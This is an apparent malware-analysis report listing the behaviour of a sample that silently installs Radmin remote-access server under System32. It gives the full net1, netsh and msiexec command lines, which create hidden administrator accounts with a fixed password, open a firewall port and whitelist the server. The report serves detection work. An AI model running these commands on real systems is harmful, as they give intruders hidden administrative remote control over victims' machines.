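Technical Information
(The report's sub-headings are missing from this copy, so the entries below run together. Read in order, they appear to be: registry values written (start types for the raddrvv3, mirrorv3 and RServer3 services, and a firewall authorized-application entry for rserver3.exe); command lines executed; file paths, apparently the files created; a second run of paths that repeats the temporary and installer files and so presumably lists files deleted after installation; two file moves; and window classes searched for. In the net1.exe lines, "Пользователи удаленного рабочего стола" and "администраторы" are the Russian names of the Remote Desktop Users and Administrators groups. "%USERNAME%s" is probably the analysis system's placeholder substituted inside the word "Administrators", so detections should match on the account creation and group-membership changes rather than on that literal string.)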
- [<HKLM>\SYSTEM\ControlSet001\Services\raddrvv3] 'Start' = '00000001'
- [<HKLM>\SYSTEM\ControlSet001\Services\mirrorv3] 'Start' = '00000001'
- [<HKLM>\SYSTEM\ControlSet001\Services\RServer3] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\rserver30\rserver3.exe' = '<SYSTEM32>\rserver30\rserver3.exe:*:Enabled:Radmin Server 3'
- '<SYSTEM32>\rserver30\rserver3.exe' /service
- '<SYSTEM32>\rserver30\FamItrfc.Exe'
- '<SYSTEM32>\rserver30\rsetup.exe' /start
- '%TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe' /stop
- '<SYSTEM32>\rserver30\rsetup.exe' /intsetup
- '<SYSTEM32>\net1.exe' localgroup "Пользователи удаленного рабочего стола" admin1 /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" admin /add
- '<SYSTEM32>\net1.exe' localgroup администраторы admin1 /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s admin1 /add
- '<SYSTEM32>\net1.exe' localgroup администраторы helpAssistant /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s helpAssistant /add
- '<SYSTEM32>\net1.exe' user helpAssistant /delete
- '<SYSTEM32>\net1.exe' user HelpAssistant 952005s /add /expires:never /passwordchg:yes /times:all
- '<SYSTEM32>\net1.exe' user Admin1 952005s /add /expires:never /passwordchg:yes /times:all
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' -Embedding 03745E15A3C18CAFC9BDD9714DA06E46
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\inst.bat" /inst.bat"
- '<SYSTEM32>\msiexec.exe' /i "%TEMP%\msupdate.msi" /qn /norestart
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 1024 all
- '<SYSTEM32>\chcp.com' 1251
- '<SYSTEM32>\runonce.exe' -r
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\rserver30\wsock32.dll,ntskd noreboot
- <SYSTEM32>\rserver30\Radmin30ru.chm
- <SYSTEM32>\rserver30\Radmin30.chm
- <SYSTEM32>\rserver30\eula.txt
- <SYSTEM32>\rserver30\1049.lng_rad
- %WINDIR%\Installer\MSIA.tmp
- %WINDIR%\Installer\MSI9.tmp
- <SYSTEM32>\rserver30\wsock32.dll
- <SYSTEM32>\rserver30\raddrvv3.sys
- <SYSTEM32>\rserver30\rsetup.exe
- <SYSTEM32>\rserver30\vcintsx.dll
- <SYSTEM32>\rserver30\vcintcx.dll
- <SYSTEM32>\rserver30\rminiv3.sys
- <SYSTEM32>\rserver30\mirrorv3.cat
- <SYSTEM32>\rserver30\mirrorv3.inf
- <SYSTEM32>\rserver30\mirrorv3.dll
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\NewShortcut4_6BF1780B36EA432B9451DD84FF5C9D52.exe
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\Z_MENU_SRVCFG_6BF1780B36EA432B9451DD84FF5C9D52.exe
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\ARPPRODUCTICON.exe
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\NewShortcut3_6BF1780B36EA432B9451DD84FF5C9D52.exe
- %WINDIR%\Installer\MSI15.tmp
- %WINDIR%\Installer\MSI14.tmp
- %WINDIR%\Installer\MSI12.tmp
- %WINDIR%\Installer\MSI11.tmp
- %WINDIR%\inf\oem3.PNF
- %WINDIR%\inf\oem3.inf
- <SYSTEM32>\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.CAT
- <DRIVERS>\SETD.tmp
- %WINDIR%\Installer\MSI10.tmp
- %WINDIR%\Installer\MSIF.tmp
- <SYSTEM32>\SETE.tmp
- %WINDIR%\Installer\MSI5.tmp
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI3.tmp
- C:\Config.Msi\2d02a.rbs
- <SYSTEM32>\rserver30\WinLpcDl.dll
- %WINDIR%\Installer\MSI8.tmp
- %WINDIR%\Installer\MSI7.tmp
- %WINDIR%\Installer\MSI2.tmp
- %WINDIR%\Installer\2d027.msi
- %TEMP%\msupdate.msi
- %TEMP%\inst.bat
- %WINDIR%\Installer\MSI1.tmp
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\FirewallInstallHelper.dll
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe
- <SYSTEM32>\rserver30\rschatx.dll
- <SYSTEM32>\rserver30\CHATLOGS\info.txt
- <SYSTEM32>\rserver30\rchatx.dll
- <SYSTEM32>\rserver30\ChatLPCx.dll
- <SYSTEM32>\rserver30\rsaudiox.dll
- <SYSTEM32>\rserver30\voicex.dll
- <SYSTEM32>\rserver30\raudiox.dll
- <SYSTEM32>\rserver30\rsl.exe
- <SYSTEM32>\rserver30\FamItrf2.Exe
- <SYSTEM32>\rserver30\FamItrfc.Exe
- <SYSTEM32>\rserver30\WinLpcDl2.dll
- <SYSTEM32>\rserver30\FirewallInstallHelper.dll
- <SYSTEM32>\rserver30\RCursor.dll
- <SYSTEM32>\rserver30\R_sui.dll
- <SYSTEM32>\rserver30\rserver3.exe
- <SYSTEM32>\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.CAT
- C:\Config.Msi\2d02a.rbs
- %WINDIR%\Installer\MSI14.tmp
- %WINDIR%\Installer\MSI5.tmp
- %WINDIR%\Installer\MSI11.tmp
- %WINDIR%\Installer\MSI12.tmp
- %WINDIR%\Installer\MSI15.tmp
- %WINDIR%\Installer\2d027.msi
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\FirewallInstallHelper.dll
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI7.tmp
- %WINDIR%\Installer\MSI3.tmp
- %WINDIR%\Installer\MSI1.tmp
- %WINDIR%\Installer\MSI2.tmp
- %WINDIR%\Installer\MSIF.tmp
- %WINDIR%\Installer\MSI10.tmp
- %WINDIR%\Installer\MSIA.tmp
- %WINDIR%\Installer\MSI8.tmp
- %WINDIR%\Installer\MSI9.tmp
- from <SYSTEM32>\SETE.tmp to <SYSTEM32>\mirrorv3.dll
- from <DRIVERS>\SETD.tmp to <DRIVERS>\rminiv3.sys
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'